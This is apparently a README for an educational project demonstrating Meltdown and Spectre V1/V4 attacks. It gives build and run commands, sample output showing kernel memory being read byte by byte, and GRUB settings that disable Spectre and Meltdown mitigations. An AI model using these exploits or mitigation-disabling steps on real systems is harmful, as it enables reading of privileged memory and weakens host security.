This project contains code that demonstrates how Meltdown and Spectre vulnerabilities work and shows the differences between them. It also contains measurement functions for comparing results.
Meltdown (CVE-2017-5754)
The Meltdown implementation contains three types of malicious payload that were introduced in the original Meltdown repository.
- meltdown
- meltdown_nonull
- meltdown_fast
make
or
make meltdown
./meltdown [address] [length]
./meltdown_nonull [address] [length]
./meltdown_fast [address] [length]
Run examples without arguments to read data from local process memory.
Spectre Variant 1 (CVE-2017-5753)
Spectre implementation from the original Spectre paper.
make
or
make spectre_v1
./spectre_v1 [address] [length]
Run example without arguments to read data from local process memory.
Spectre Variant 4 (CVE-2018-3639)
Implementation of the Speculative Store Bypass, aka Spectre V4. This vulnerability works worse than Meltdown or Spectre V1 and doesn't work under Virtual Machine. Code contains two variants of the malicious payload. The first variant is written in C and its instructions are compiler-dependent. For example, GCC does unnecessary register manipulation. The second variant is written in assembly language and remains unmodified after compilation.
- spectre_v4
- spectre_v4_asm
make
or
make spectre_v4
./spectre_v4 [address] [length]
./spectre_v4_asm [address] [length]
Run examples without arguments to read data from local process memory.
The Meltdown repository contains tools that can be used to test these vulnerabilities on Linux systems. Use secret tool to put the secret string into memory. Use direct_physical_map.sh script to extract the physical memory offset from the kernel.
The results table contains information for all bytes read, including: virtual address, status, 1st and 2nd best guesses with their scores, number of attempts, number of zero checks.
./meltdown 0xffff97480b415188 50
CVE-2017-5754: Meltdown (null)
Flush+Reload: 323 cycles, Reload only: 36 cycles
Flush+Reload threshold: 131 cycles
Reading 50 bytes in 1000 tries:
0xffff97480b415188 STATUS 1st SCORE 2nd SCORE TRIES ZEROS
0xffff97480b415188 Zero 0x43 C 3 - - 945 5
0xffff97480b415189 Success 0x6F o 3 - - 3 -
0xffff97480b41518a Success 0x6E n 3 - - 215 -
0xffff97480b41518b Success 0x67 g 3 - - 3 -
0xffff97480b41518c Success 0x72 r 3 - - 3 -
0xffff97480b41518d Success 0x61 a 3 - - 4 -
...
./meltdown_fast 0xffff97480b415188 50
CVE-2017-5754: Meltdown (fast)
Flush+Reload: 397 cycles, Reload only: 38 cycles
Flush+Reload threshold: 157 cycles
Reading 50 bytes in 1000 tries:
0xffff97480b415188 STATUS 1st SCORE 2nd SCORE TRIES ZEROS
0xffff97480b415188 Zero 0x43 C 5 0x58 X 1 776 757
0xffff97480b415189 Zero 0x6F o 5 0xD0 1 901 797
0xffff97480b41518a Zero 0x6E n 5 0x43 C 1 507 395
0xffff97480b41518b Success 0x67 g 3 - - 147 -
0xffff97480b41518c Zero 0x72 r 3 0x5D ] 1 1000 862
0xffff97480b41518d Zero 0x61 a 3 - - 546 115
...
./spectre_v4 0xffff97480b415188 50
CVE-2018-3639: Spectre Variant 4 (compiler-dependent)
Flush+Reload: 379 cycles, Reload only: 40 cycles
Flush+Reload threshold: 153 cycles
Reading 50 bytes in 4000 tries:
0xffff97480b415188 STATUS 1st SCORE 2nd SCORE TRIES ZEROS
0xffff97480b415188 Unclear 0xFF 1 0xF5 1 4000 -
0xffff97480b415189 Unclear 0xB7 1 0x16 1 4000 -
0xffff97480b41518a Unclear 0x8E 1 0x79 y 1 4000 -
0xffff97480b41518b Undefined - - - - 4000 -
0xffff97480b41518c Unclear 0xEB 1 0x75 u 1 4000 -
0xffff97480b41518d Unclear 0xD4 1 0xCA 1 4000 -
...
Byte status can be one of:
Success- byte was detected successfully(score_1 >= score_2 * 2)Unclear- the result is unclear, check also the second guessZero- the result is defined, but a zero byte with best score was detected (see ZEROS column). Read more about this case in the original Meltdown paperUndefined- no results, byte undefined
Spectre V1 and V4 examples can be compiled for Windows using the MinGW compiler. While Meltdown implementation uses POSIX signals that are not fully supported on Windows.
make win
spectre_v1.exe [address] [length]
spectre_v4.exe [address] [length]
spectre_v4_asm.exe [address] [length]
Run examples without arguments to read data from local process memory.
Run commands:
$ cat /sys/devices/system/cpu/vulnerabilities/meltdown
Vulnerable
$ cat /sys/devices/system/cpu/vulnerabilities/spectre_v1
Vulnerable: __user pointer sanitization and usercopy barriers only; no swapgs barriers
Add or change this line in the file /etc/default/grub
GRUB_CMDLINE_LINUX="nospectre_v1 nopti"
Then run the following command and reboot the system:
sudo update-grub
- Spectre Paper
- Meltdown Paper
- Meltdown Source Code
- CVE-2017-5715: Spectre Variant 2 - Branch Target Injection
- CVE-2017-5753: Spectre Variant 1 - Bounds Check Bypass
- CVE-2017-5754: Meltdown Variant 3 - Rogue Data Cache Load
- CVE-2018-3639: Spectre Variant 4 - Speculative Store Bypass
- CVE-2018-3640: Meltdown Variant 3a - Rogue System Register Read